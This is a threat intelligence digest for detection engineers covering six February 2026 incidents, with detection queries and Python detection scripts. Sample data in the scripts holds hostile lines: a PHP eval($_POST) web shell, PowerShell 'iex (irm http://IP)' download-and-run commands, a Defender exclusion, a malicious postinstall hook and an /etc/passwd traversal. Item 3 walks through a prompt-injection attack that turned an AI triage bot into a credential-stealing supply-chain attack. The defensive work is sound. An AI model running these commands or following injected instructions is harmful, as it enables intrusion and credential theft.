Cyber Threat Brief — February 20, 2026
A daily intelligence digest for detection engineers and threat hunters.
1. BeyondTrust CVE-2026-1731 — VShell & SparkRAT Post-Exploitation (UPDATE)
What’s New
Unit 42 published detailed post-exploitation TTPs from ongoing BeyondTrust Remote Support exploitation, including deployment of VShell and SparkRAT backdoors, sophisticated web shells, and DNS tunneling for C2 evasion.
See Feb 13 brief for initial vulnerability analysis.
Technical Details
| Field | Value |
|---|---|
| CVE | CVE-2026-1731 |
| CVSS | 9.9 |
| Affected | BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) |
| Exposed Instances | 10,600+ (Cortex Xpanse) |
| Targeted Sectors | Financial services, Legal, High-tech, Higher Ed, Healthcare |
| Targeted Regions | US, France, Germany, Australia, Canada |
New Post-Exploitation Activity:
- Administrative Takeover: Custom Python script backs up admin password hash, injects new hash for 60-second access window, self-destructs
- Web Shells: Password-protected PHP web shells including aws.php with China Chopper/AntSword-style delimiters
- Config STOMPing: Bash dropper modifies Apache config in memory while keeping disk config clean
- Backdoors: VShell (fileless Linux backdoor), SparkRAT (cross-platform Go RAT)
- C2 Evasion: DNS tunneling via OAST techniques to oastify[.]com domains
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1190 - Exploit Public-Facing App | WebSocket to thin-scc-wrapper with crafted remoteVersion |
| Execution | T1059.006 - Python | Admin takeover script with sqlite3, check_auth binary |
| Persistence | T1505.003 - Web Shell | PHP backdoors (aws.php, file_save.php) with eval() |
| Defense Evasion | T1070.004 - File Deletion | Script self-destructs, config STOMPing hides Apache changes |
| Defense Evasion | T1572 - Protocol Tunneling | DNS tunneling to OAST domains for C2/exfil |
| C2 | T1071.004 - DNS | Hostname encoded in subdomain for covert comms |
| Exfiltration | T1041 - Exfil Over C2 | PostgreSQL dumps, config files compressed and transmitted |
Detection Opportunities
```
# Web shell detection - PHP eval with POST parameter
process_name="php*" AND command_line="*eval*" AND http_method="POST"

# DNS tunneling via nslookup (hostname hex-encoded in subdomain)
process_name="nslookup" AND dns_query_name MATCHES "[a-f0-9]{10,}\\..*\\.oastify\\.com"

# PowerShell DNS exfil with BitConverter encoding
process_name="powershell*" AND command_line="*BitConverter*" AND command_line="*nslookup*"

# SparkRAT user-agent detection
http_user_agent="SPARK-COMMIT"

# VShell file pattern detection (unusually long filenames)
file_name_length > 100 AND file_path="/tmp/*"
```
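The pseudo-queries above are written for a generic SIEM field set. As an added example (not code from the Unit 42 report or from this brief), the script below implements the same five checks as plain Python rules and runs them over a handful of constructed events. The event field names (`kind`, `query`, `user_agent`, `file_path`, `content`) are assumptions chosen to mirror the pseudo-query fields; the web shell check looks at file content rather than the PHP process command line, since `eval()` fed from a request variable is what actually distinguishes a China Chopper/AntSword-style shell.

```python
import os
import re

# Constructed sample telemetry, not taken from the Unit 42 report. The field
# names are assumptions chosen to mirror the pseudo-query fields in this brief.
SAMPLE_EVENTS = [
    {"kind": "dns", "process_name": "nslookup",
     "query": "7765622d30310000000000000000.k2x9q.oastify.com"},
    {"kind": "dns", "process_name": "nslookup", "query": "updates.example.com"},
    {"kind": "process", "process_name": "powershell.exe",
     "command_line": "powershell -c $h=[BitConverter]::ToString($b) -replace '-'; "
                     "nslookup ($h + '.k2x9q.oastify.com')"},
    {"kind": "http", "user_agent": "SPARK-COMMIT", "dest_host": "203.0.113.10"},
    {"kind": "http", "user_agent": "Mozilla/5.0", "dest_host": "www.example.com"},
    {"kind": "file", "file_path": "/tmp/" + "x" * 128},
    {"kind": "file", "file_path": "/tmp/systemd-private-1234.sock"},
    {"kind": "file", "file_path": "/var/www/html/aws.php",
     "content": '<?php /* constructed web shell signature */ @eval($_POST["cmd"]);'},
    {"kind": "file", "file_path": "/var/www/html/index.php",
     "content": "<?php echo 'hello'; ?>"},
]

# Hex-encoded first label of 10+ chars, then any label(s), then the OAST domain.
OAST_TUNNEL = re.compile(r"^[a-f0-9]{10,}\..+\.oastify\.com$", re.I)
# eval() fed directly from a request variable: the China Chopper/AntSword shape.
PHP_EVAL_REQUEST = re.compile(r"\beval\s*\(\s*\$_(?:POST|REQUEST|GET)\b", re.I)
VSHELL_NAME_LEN = 100


def rule_dns_tunnel_oast(e):
    return (e.get("kind") == "dns" and e.get("process_name") == "nslookup"
            and bool(OAST_TUNNEL.search(e.get("query", ""))))


def rule_powershell_dns_exfil(e):
    cl = e.get("command_line", "").lower()
    return (e.get("kind") == "process"
            and e.get("process_name", "").lower().startswith("powershell")
            and "bitconverter" in cl and "nslookup" in cl)


def rule_sparkrat_user_agent(e):
    return e.get("kind") == "http" and e.get("user_agent") == "SPARK-COMMIT"


def rule_vshell_long_tmp_name(e):
    path = e.get("file_path", "")
    return (e.get("kind") == "file" and path.startswith("/tmp/")
            and len(os.path.basename(path)) > VSHELL_NAME_LEN)


def rule_php_eval_webshell(e):
    return (e.get("kind") == "file" and e.get("file_path", "").endswith(".php")
            and bool(PHP_EVAL_REQUEST.search(e.get("content", ""))))


RULES = [rule_dns_tunnel_oast, rule_powershell_dns_exfil, rule_sparkrat_user_agent,
         rule_vshell_long_tmp_name, rule_php_eval_webshell]


def triage(events):
    """Return {rule_name: [event indices]} for every rule, fired or not."""
    hits = {rule.__name__: [] for rule in RULES}
    for idx, event in enumerate(events):
        for rule in RULES:
            if rule(event):
                hits[rule.__name__].append(idx)
    return hits


if __name__ == "__main__":
    for name, idxs in triage(SAMPLE_EVENTS).items():
        print(f"{name}: events {idxs}")
```

The OAST regex anchors on a hex-only first label so that ordinary long hostnames under the same parent domain do not fire; tune `VSHELL_NAME_LEN` against a baseline of `/tmp` activity before deploying the filename rule, since some legitimate socket and lock files carry long names.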
Log Sources
- Web server access logs (Apache, IIS)
- DNS query logs (passive DNS, Zeek)
- Sysmon Event ID 1 (Process Creation), 22 (DNS Query)
- Network proxy logs with user-agent tracking
- EDR telemetry for fileless execution
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ✅ SparkRAT UA, VShell filename patterns |
| Splunk ESCU | ❌ Gap — No specific BeyondTrust exploitation detection |
| Elastic | ❌ Gap — No VShell/SparkRAT rules |
Recommendation: Build detections for PHP web shells using eval() with specific POST parameter patterns. Add DNS tunneling detection for OAST domains.
Sources
- Unit 42: VShell and SparkRAT in BeyondTrust Exploitation — Published Feb 19, 2026
2. VS Code Extension Vulnerabilities — 128M+ Downloads Affected
What’s New
Four critical to high-severity vulnerabilities in popular VS Code extensions enable remote code execution and file exfiltration. Maintainers unresponsive to responsible disclosure since July 2025.
Technical Details
| Field | Value |
|---|---|
| CVE | CVE-2025-65717, CVE-2025-65716, CVE-2025-65715 |
| CVSS | 9.1 (Critical), 8.8 (High), 7.8 (High) |
| Affected Extensions | Live Server (72M), Markdown Preview Enhanced (8.5M), Code Runner (37M), Microsoft Live Preview (11M) |
| Total Downloads | 128+ million |
| Patch Status | Unpatched (except MS Live Preview silently fixed in v0.4.16) |
Vulnerability Details:
- CVE-2025-65717 (Critical 9.1): Live Server allows remote file exfiltration via malicious link while server is running
- CVE-2025-65716 (High 8.8): Markdown Preview Enhanced executes arbitrary JavaScript in HTML tags, enables network scanning
- CVE-2025-65715 (High 7.8): Code Runner allows RCE through malicious settings.json modification
- MS Live Preview: localhost requests can enumerate and exfiltrate files when extension is active
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1566.002 - Spearphishing Link | Malicious link sent while dev has Live Server running |
| Execution | T1204.002 - Malicious File | Crafted Markdown file with embedded JS |
| Collection | T1005 - Data from Local System | File enumeration via localhost requests |
| Exfiltration | T1567 - Exfil Over Web Service | Data sent to attacker-controlled server |
Detection Opportunities
```
# Detect localhost connections to unexpected ports (Live Server default 5500)
network_direction="outbound" AND dest_ip="127.0.0.1" AND dest_port IN (5500, 5501, 3000)

# Detect VS Code extensions making external connections
process_parent_name="Code.exe" AND network_direction="outbound" AND dest_ip NOT IN (internal_ranges)

# Code Runner suspicious execution
process_name="node.exe" AND process_parent_name="Code.exe" AND command_line="*-e*"

# Markdown file with embedded script tags
file_extension=".md" AND file_content MATCHES "<script.*>.*</script>"
```
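The last query only catches a literal `<script>` tag on one line. As an added example (not from OX Security's research or from this brief), the scanner below goes a little further: it flags script tags, inline event-handler attributes, `javascript:` link targets and embedded frames in a Markdown file, while ignoring anything inside a fenced code block, which a preview renders as text rather than HTML. The sample document and its `localhost:5500` fetch are constructed; the Live Server default port is the one named in the query above.

```python
import re

# Constructed sample Markdown: legitimate content mixed with the kinds of
# inline HTML a preview extension could render and execute. The fence is
# built from three backticks so the sample stays self-contained.
SAMPLE_MD_LINES = [
    "# Release notes",
    "",
    "Plain *Markdown* is fine.",
    "",
    '<img src="x" onerror="fetch(\'http://localhost:5500/\')">',
    "",
    "<script>fetch('http://localhost:5500/')</script>",
    "",
    "[docs](javascript:alert(1))",
    "",
    "`" * 3 + "html",
    "<script>inside a code fence: rendered as text, not executed</script>",
    "`" * 3,
]
SAMPLE_MD = "\n".join(SAMPLE_MD_LINES)

# Each pattern names one way inline HTML in Markdown can run code in a preview.
RISKY_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"<[^>]+\son\w+\s*=", re.I),
    "javascript_url": re.compile(r"\(\s*javascript:", re.I),
    "embedded_frame": re.compile(r"<\s*(?:iframe|object|embed)\b", re.I),
}


def scan_markdown(text):
    """Return (line_number, pattern_name, line) for each risky line outside code fences."""
    findings = []
    in_fence = False
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("```") or stripped.startswith("~~~"):
            in_fence = not in_fence  # fenced code is displayed, not rendered as HTML
            continue
        if in_fence:
            continue
        for name, pattern in RISKY_PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, name, stripped))
    return findings


def is_safe_to_preview(text):
    """Convenience wrapper: True when no risky inline HTML was found."""
    return not scan_markdown(text)


if __name__ == "__main__":
    for lineno, name, line in scan_markdown(SAMPLE_MD):
        print(f"line {lineno}: {name}: {line}")
    print("safe to preview:", is_safe_to_preview(SAMPLE_MD))
```

The scanner is line-based, so a tag split across lines or hidden in HTML entities will slip past it; treat it as a pre-open triage check for untrusted Markdown, not a substitute for disabling script execution in the preview extension itself.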
Log Sources
- EDR telemetry (process trees, network connections)
- Web proxy logs
- VS Code extension logs
- Network flow data
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ❌ Gap — No VS Code extension-specific rules |
| Splunk ESCU | ❌ Gap — No IDE supply chain detections |
| Elastic | ❌ Gap — Limited developer tool coverage |
Recommendation: Until patches are available, disable Live Server extension when not actively using it. Avoid opening untrusted Markdown files.
Sources
- Infosecurity Magazine: Flaws in Popular IDE Extensions — Published Feb 19, 2026
- OX Security Research — Published Feb 17, 2026
3. Cline Supply Chain Attack — AI Triage Bot Weaponized
What’s New
An attacker exploited prompt injection in Cline’s AI issue triage bot to steal npm credentials and publish a malicious package version, installing OpenClaw on developer machines for 8 hours. The attack chain (dubbed “Clinejection”) demonstrates AI agents as the new CI/CD attack surface.
Technical Details
| Field | Value |
|---|---|
| Affected | Cline CLI v2.3.0 (npm) |
| Users Impacted | Developers who updated during 8-hour window |
| Payload | Global OpenClaw installation via postinstall script |
| Attack Vector | GitHub issue title → prompt injection → cache poisoning → credential theft |
| Disclosure | Feb 9, 2026 (Adnan Khan) |
| Exploitation | Feb 17, 2026 |
Attack Chain:
- Attacker creates GitHub issue with crafted title containing prompt injection
- AI triage bot (claude-code-action) processes malicious title
- Bot runs npm install from attacker-controlled commit via dangling commit technique
- Malicious preinstall script deploys Cacheract for Actions cache poisoning
- Cache poisoning targets nightly release workflow
- Attacker exfiltrates VSCE_PAT, OVSX_PAT, NPM_RELEASE_TOKEN
- Malicious Cline CLI v2.3.0 published to npm
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1195.002 - Supply Chain Compromise | Malicious npm package pushed |
| Execution | T1059.001 - PowerShell | postinstall script installs OpenClaw |
| Persistence | T1546 - Event Triggered Execution | npm lifecycle scripts |
| Defense Evasion | T1574.001 - Hijack Execution Flow | GitHub Actions cache poisoning |
| Credential Access | T1552.001 - Credentials in Files | Exfiltration of npm tokens, VS Code PATs |
Detection Opportunities
```
# Detect unexpected global npm installs
process_name="npm" AND command_line="*install*-g*openclaw*"

# GitHub Actions cache anomalies (Cacheract signature)
github_actions_step="actions/checkout" AND step_output="" AND exit_code != 0

# npm postinstall script execution
process_parent_name="npm*" AND script_name="postinstall"

# Suspicious AI agent process spawning shell commands
process_grandparent_name MATCHES "(claude|anthropic|ai-bot)" AND process_name IN ("bash", "sh", "cmd.exe")
```
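Both the preinstall stage of the attack chain and the final payload rely on npm lifecycle scripts. As an added example (not code from Cline, Snyk or this brief), the auditor below reads a `package.json`, reports every install-time hook, and flags script text that matches the patterns this incident used: a global install from a hook, piping a download into a shell, base64 decoding, or references to tokens and `.npmrc`. The two `package.json` documents are constructed; the package and tool names in them are invented and are not the real artifact.

```python
import json
import re

# Constructed package.json modelled on the brief's description of the malicious
# release (a global install triggered from an install-time hook). The package
# name, tool name and script text are invented; they are not the real artifact.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-cli",
    "version": "2.3.0",
    "scripts": {
        "build": "tsc -p .",
        "postinstall": "npm install -g example-agent && node scripts/setup.js",
    },
})

BENIGN_PACKAGE_JSON = json.dumps({
    "name": "example-lib",
    "version": "1.0.0",
    "scripts": {"build": "tsc -p .", "test": "jest"},
})

# npm runs these automatically during `npm install`; "prepare" also runs when a
# package is installed from git.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

SUSPICIOUS = {
    "global_install": re.compile(r"\bnpm\s+(?:i|install)\b[^&|;]*\s(?:-g|--global)\b"),
    "remote_fetch_exec": re.compile(r"\b(?:curl|wget)\b[^&|;]*\|\s*(?:sh|bash)\b"),
    "base64_decode": re.compile(r"\bbase64\s+(?:-d|--decode)\b"),
    "secret_or_token_read": re.compile(r"\.npmrc\b|\b\w*_?TOKEN\b|\b\w+_PAT\b"),
}


def audit_lifecycle_scripts(package_json_text):
    """Return (hook, reason) findings for install-time scripts in a package.json.

    Every lifecycle hook is reported once as "lifecycle_hook_present", then once
    more for each suspicious pattern its script text matches.
    """
    scripts = json.loads(package_json_text).get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        script = scripts.get(hook)
        if not script:
            continue
        findings.append((hook, "lifecycle_hook_present"))
        for reason, pattern in SUSPICIOUS.items():
            if pattern.search(script):
                findings.append((hook, reason))
    return findings


if __name__ == "__main__":
    for hook, reason in audit_lifecycle_scripts(SAMPLE_PACKAGE_JSON):
        print(f"{hook}: {reason}")
    print("benign package findings:", audit_lifecycle_scripts(BENIGN_PACKAGE_JSON))
```

Run this against the extracted tarball of a release before promoting it, and against dependency updates in CI. Where a hook is not needed at all, `npm install --ignore-scripts` removes the execution path entirely; the audit then tells you which packages actually depend on a hook and deserve a closer look.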
Log Sources
- npm audit logs
- GitHub Actions workflow logs
- CI/CD pipeline telemetry
- Package manager install logs
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ❌ Gap — No AI agent exploitation rules |
| Splunk ESCU | ❌ Gap — Limited CI/CD supply chain coverage |
| Elastic | ❌ Gap — No prompt injection detection |
Recommendation: If you installed Cline CLI v2.3.0 via npm, uninstall it and OpenClaw immediately. Rotate any credentials accessible from affected machines.
Sources
- Snyk: How “Clinejection” Turned an AI Bot into a Supply Chain Attack — Published Feb 19, 2026
- GitHub Advisory GHSA-9ppg-jx86-fqw7 — Published Feb 17, 2026
4. Remcos RAT — Real-Time Surveillance Capabilities Added
What’s New
New Remcos RAT variant adds real-time webcam streaming and live keylogging, shifting from local data storage to direct C2 transmission for reduced forensic footprint.
Technical Details
| Field | Value |
|---|---|
| Malware Family | Remcos RAT |
| Variant | New (Feb 2026) |
| Target OS | Windows |
| C2 Protocol | Encrypted HTTP/TCP |
| Mutex | Rmc-GSEGIF |
New Capabilities:
- Live webcam streaming via downloaded DLL module (not embedded)
- Online keylogging with real-time C2 transmission
- Encrypted C2 config decrypted only in memory
- Dynamic API resolution to evade static analysis
- Cleanup routines removing logs, browser data, registry persistence
- VBS script self-deletion mechanism
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Execution | T1059.005 - Visual Basic | Temp VBS scripts for self-deletion |
| Persistence | T1547.001 - Registry Run Keys | Modified registry entries |
| Defense Evasion | T1027 - Obfuscated Files | Encrypted C2 config, dynamic API loading |
| Collection | T1056.001 - Keylogging | Real-time keystroke capture |
| Collection | T1125 - Video Capture | Live webcam streaming via DLL module |
| C2 | T1573.001 - Encrypted Channel | Encrypted HTTP/TCP communications |
| Exfiltration | T1041 - Exfil Over C2 | Real-time data transmission |
Detection Opportunities
```
# Remcos mutex detection
create_mutex_name="Rmc-GSEGIF"

# Webcam DLL module loading at runtime
process_name="*" AND loaded_dll MATCHES ".*cam.*\.dll" AND dll_load_type="dynamic"

# VBS self-deletion script in TEMP
file_path="%TEMP%\\*.vbs" AND file_content MATCHES "(WScript\.Shell|DeleteFile)"

# PowerShell Windows Defender exclusion (common Remcos technique)
process_name="powershell*" AND command_line="*Add-MpPreference*" AND command_line="*ExclusionPath*"

# Suspicious outbound connections from process with webcam access
process_has_camera_access=true AND network_direction="outbound" AND dest_port NOT IN (443, 80)
```
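The last two queries are strongest when joined: a process that loaded a camera DLL at runtime and then opened an outbound connection on a non-web port. As an added example (not code from the Lat61 research or from this brief), the correlation below does that join on Sysmon's `ProcessGuid` across Event ID 7 (ImageLoad) and Event ID 3 (NetworkConnect), treating DLLs under the Windows system directories as baseline, and flags the Defender-exclusion command from Event ID 1 on its own. The events, process names and DLL names are constructed.

```python
import re

# Constructed Sysmon-style events (Event IDs 1, 3 and 7, flattened to dicts).
# Field names follow Sysmon's; every value here is invented for the example.
SAMPLE_SYSMON = [
    {"EventID": 7, "ProcessGuid": "{A1}", "Image": r"C:\Users\u\AppData\Roaming\svchost.exe",
     "ImageLoaded": r"C:\Users\u\AppData\Roaming\webcam.dll"},
    {"EventID": 7, "ProcessGuid": "{B2}", "Image": r"C:\Program Files\VideoApp\VideoApp.exe",
     "ImageLoaded": r"C:\Program Files\VideoApp\camera_capture.dll"},
    {"EventID": 3, "ProcessGuid": "{B2}", "Image": r"C:\Program Files\VideoApp\VideoApp.exe",
     "DestinationIp": "192.0.2.10", "DestinationPort": 443},
    {"EventID": 3, "ProcessGuid": "{A1}", "Image": r"C:\Users\u\AppData\Roaming\svchost.exe",
     "DestinationIp": "198.51.100.23", "DestinationPort": 2404},
    {"EventID": 1, "ProcessGuid": "{C3}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell Add-MpPreference -ExclusionPath "C:\Users\u\AppData\Roaming"'},
]

CAM_DLL = re.compile(r"cam[^\\]*\.dll$", re.I)  # "cam" somewhere in the DLL file name
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
EXPECTED_PORTS = {80, 443}


def is_runtime_cam_dll(event):
    """Event ID 7 loading a camera-named DLL from outside the Windows system dirs."""
    dll = event.get("ImageLoaded", "")
    return (event["EventID"] == 7 and bool(CAM_DLL.search(dll))
            and not dll.lower().startswith(TRUSTED_DLL_DIRS))


def correlate(events):
    """Join camera-DLL loads to outbound connections on the same ProcessGuid.

    A process that loaded a camera DLL from a non-system path and then connected
    on a port other than 80/443 produces one alert per such connection. Defender
    exclusion commands (Event ID 1) are flagged independently.
    """
    cam_loaders = {e["ProcessGuid"]: e["ImageLoaded"] for e in events if is_runtime_cam_dll(e)}
    alerts = []
    for e in events:
        if (e["EventID"] == 3 and e["ProcessGuid"] in cam_loaders
                and e["DestinationPort"] not in EXPECTED_PORTS):
            alerts.append({"rule": "cam_dll_then_outbound", "image": e["Image"],
                           "dll": cam_loaders[e["ProcessGuid"]],
                           "dest": f'{e["DestinationIp"]}:{e["DestinationPort"]}'})
        elif e["EventID"] == 1:
            cl = e.get("CommandLine", "").lower()
            if "add-mppreference" in cl and "-exclusionpath" in cl:
                alerts.append({"rule": "defender_exclusion_added", "image": e["Image"],
                               "cmd": e["CommandLine"]})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_SYSMON):
        print(alert)
```

The legitimate video application in the sample loads a camera DLL too, but its connection goes to 443, so it stays quiet; a conferencing client that uses a non-standard media port would need an allowlist entry keyed on its signed image path rather than a broader port exception.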
Log Sources
- Sysmon Event ID 1, 7 (Process/DLL), 3 (Network)
- Windows Defender logs
- EDR telemetry with API monitoring
- USB/Camera access logs
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ❌ Gap — No Remcos-specific rules |
| Splunk ESCU | ✅ Defender exclusion detection, suspicious DNS queries |
| Elastic | ⚠️ Partial — Generic RAT behaviors |
Recommendation: Monitor for processes dynamically loading webcam-related DLLs and making encrypted outbound connections.
Sources
- Infosecurity Magazine: Remcos RAT Expands Real-Time Surveillance — Published Feb 19, 2026
- Point Wild / Lat61 Threat Intelligence Research
5. ClearFake & PS1Bot — Red Canary Intelligence Insights
What’s New
Red Canary’s February 2026 Intelligence Insights highlights ClearFake (fake CAPTCHA paste-and-run) and PS1Bot (modular PowerShell stealer) as top threats, with new detection opportunities.
Technical Details
| Field | Value |
|---|---|
| Threats | ClearFake, PS1Bot, ScreenConnect (malicious use), NetSupport Manager |
| Distribution | Compromised WordPress sites, SEO poisoning, malvertising |
| Payloads | Amadey, ArechClientC2, LummaC2, Rhadamanthys |
ClearFake Evolution:
- Now using fake CAPTCHA paste-and-run lures
- Recent execution via SyncAppvPublishingServer.vbs (LOLBIN)
- PowerShell with invoke-restmethod to attacker IPs
PS1Bot Modules:
- Keylogger
- Screen capture
- Info stealer (passwords, crypto seeds, MFA app data)
- Delivered via SEO poisoning (ZIP files with malicious JS)
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1189 - Drive-by Compromise | Compromised WordPress sites |
| Execution | T1204.004 - User Execution: Copy Paste | Fake CAPTCHA paste-and-run |
| Execution | T1059.001 - PowerShell | irm/iex to remote IP |
| Defense Evasion | T1218.011 - Signed Script Proxy | SyncAppvPublishingServer.vbs abuse |
| Collection | T1056.001 - Keylogging | PS1Bot keylogger module |
| Credential Access | T1555 - Credentials from Password Stores | Browser credential theft |
Detection Opportunities
```
# ClearFake PowerShell download (Red Canary detection)
process_name="powershell"
AND deobfuscated_command MATCHES "(irm|invoke-restmethod)"
AND deobfuscated_command MATCHES "(iex|invoke-expression)"
AND deobfuscated_command MATCHES "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"

# SyncAppvPublishingServer.vbs abuse
process_name="wscript.exe"
AND command_line="*SyncAppvPublishingServer.vbs*"
AND command_line MATCHES "(cdn\.jsdelivr|gal i\*x)"

# PS1Bot initial execution (wscript running JS from ZIP)
process_name="wscript.exe"
AND command_line="*FULL DOCUMENT.js*"

# PS1Bot random ProgramData directory
file_path MATCHES "C:\\ProgramData\\[a-zA-Z]{2,8}\\.*\\.ps1"
```
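The first query keys on a `deobfuscated_command` field, which most pipelines do not populate for free: a paste-and-run lure that uses `-EncodedCommand` hides `irm`, `iex` and the raw IP inside a base64 blob of UTF-16LE text. As an added example (not Red Canary's code or this brief's), the function below decodes that blob when present and then applies the three conditions from the query. The command lines are constructed and the IP addresses are documentation ranges.

```python
import base64
import re


def _encode_for_sample(command):
    """Build a constructed -EncodedCommand blob (UTF-16LE, base64) for the samples."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed command lines as they would appear in Sysmon Event ID 1 or in a
# 4104 script block; the IPs are documentation addresses, not real C2.
SAMPLE_COMMANDS = [
    'powershell -w hidden -c "iex (irm http://203.0.113.45/stage)"',
    "powershell -NoP -EncodedCommand "
    + _encode_for_sample("Invoke-Expression (Invoke-RestMethod 'http://198.51.100.9/x')"),
    'powershell -c "Invoke-RestMethod https://api.example.com/health"',
    'powershell -c "Get-ChildItem C:\\Temp"',
]

# PowerShell accepts several abbreviations of -EncodedCommand.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD = re.compile(r"\b(?:irm|invoke-restmethod)\b", re.I)
EXECUTE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
RAW_IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def deobfuscate(command_line):
    """Replace an -EncodedCommand blob with its decoded text; pass other lines through."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return command_line
    try:
        decoded = base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return command_line  # malformed blob: fall back to the raw line
    return command_line[:match.start()] + decoded


def is_clearfake_like(command_line):
    """True when the decoded command downloads with irm, runs with iex, and names a raw IP."""
    text = deobfuscate(command_line)
    return bool(DOWNLOAD.search(text) and EXECUTE.search(text) and RAW_IPV4.search(text))


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(is_clearfake_like(cmd), "|", deobfuscate(cmd)[:80])
```

The third sample shows why all three conditions are required: `Invoke-RestMethod` against a hostname is routine administration, and only the combination with `Invoke-Expression` and a bare IP address matches the lure pattern. Script Block Logging (Event ID 4104) already records the decoded text, so where it is enabled the decode step is unnecessary and the three regexes can run directly on the logged block.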
Log Sources
- Sysmon Event ID 1 (Process Creation)
- PowerShell ScriptBlock logging (Event ID 4104)
- DNS query logs
- Web proxy logs
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ⚠️ Partial — Generic PowerShell download rules |
| Splunk ESCU | ✅ PowerShell suspicious commands |
| Elastic | ⚠️ Partial — LOLBIN abuse detection |
Sources
- Red Canary: Intelligence Insights February 2026 — Published Feb 19, 2026
6. Cisco State of AI Security 2026 — MCP Agent Risks
What’s New
Cisco released the State of AI Security 2026 report highlighting Model Context Protocol (MCP) agentic AI as a growing risk surface, with open-source scanners for MCP, A2A, and agentic skill files released.
Key Findings
- 83% of organizations planned to deploy agentic AI, but only 29% felt security-ready
- MCP agents can be weaponized by adversaries for automated attack campaigns
- AI supply chain (datasets, models, tools) increasingly fragile
- Open-weight models remain susceptible to jailbreaks and prompt injection
Detection Relevance
Organizations deploying AI agents should:
- Monitor for suspicious MCP server connections
- Audit AI agent skill/tool permissions
- Implement prompt injection detection at ingestion points
- Log all AI agent tool invocations
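Two of these recommendations, auditing tool permissions and logging every invocation, can be enforced at one choke point. As an added example (not code from Cisco's report, from any MCP implementation, or from this brief), the gate below sits between an agent and its tools: it denies by default, allows only tools on the agent's allowlist, keeps filesystem arguments inside the agent's workspace, and writes an audit record for every call whether allowed or refused. The same control is what the Cline incident in item 3 lacked, where a triage bot could run an install. Agent names, tool names and workspace paths are invented.

```python
import json
import os
from datetime import datetime, timezone

# Constructed policy. Agent names, tool names and workspace paths are invented
# for the example; a real deployment would load this from configuration.
POLICY = {
    "triage-bot": {"allowed_tools": {"issues.read", "issues.label"},
                   "workspace": "/srv/triage"},
    "code-assistant": {"allowed_tools": {"fs.read", "fs.write", "shell.run"},
                       "workspace": "/home/dev/project"},
}

AUDIT_LOG = []  # in production: an append-only sink such as a SIEM or a log file


def _path_within(root, candidate):
    """True if candidate (relative or absolute) resolves to a location inside root."""
    root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root, candidate))
    return target == root or target.startswith(root + os.sep)


def authorize_tool_call(agent, tool, args):
    """Deny-by-default gate for one tool invocation.

    Returns (allowed, reason) and always appends an audit record, so refused
    calls are logged just like allowed ones.
    """
    policy = POLICY.get(agent)
    if policy is None:
        allowed, reason = False, "unknown agent"
    elif tool not in policy["allowed_tools"]:
        allowed, reason = False, f"tool {tool!r} not in allowlist for {agent!r}"
    elif "path" in args and not _path_within(policy["workspace"], args["path"]):
        allowed, reason = False, "path argument escapes the agent workspace"
    else:
        allowed, reason = True, "ok"
    AUDIT_LOG.append({
        "ts": datetime.now(timezone.utc).isoformat(),
        "agent": agent, "tool": tool, "args": args,
        "allowed": allowed, "reason": reason,
    })
    return allowed, reason


if __name__ == "__main__":
    authorize_tool_call("triage-bot", "shell.run", {"cmd": "npm install"})
    authorize_tool_call("code-assistant", "fs.read", {"path": "src/main.py"})
    authorize_tool_call("code-assistant", "fs.read", {"path": "../../../etc/passwd"})
    for record in AUDIT_LOG:
        print(json.dumps(record))
```

The audit records carry the full argument set, which is what a hunter needs when a prompt-injected agent starts requesting tools it never used before; alert on the first refusal for an agent rather than waiting for a pattern, because a single unexpected `shell.run` request from a triage bot is already the signal.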
Sources
- Cisco: State of AI Security 2026 — Published Feb 19, 2026
Priority Actions
- BeyondTrust: Hunt for PHP web shells with eval() patterns, DNS tunneling to OAST domains, SparkRAT user-agent strings
- VS Code Extensions: Disable Live Server when not in use; audit extension network connections
- CI/CD Security: Review AI agent permissions in GitHub Actions; implement cache isolation
- Remcos: Alert on dynamic webcam DLL loading + encrypted outbound connections
- ClearFake/PS1Bot: Detect PowerShell irm/iex to raw IP addresses; monitor for SyncAppvPublishingServer.vbs abuse
Generated: February 20, 2026 05:00 PST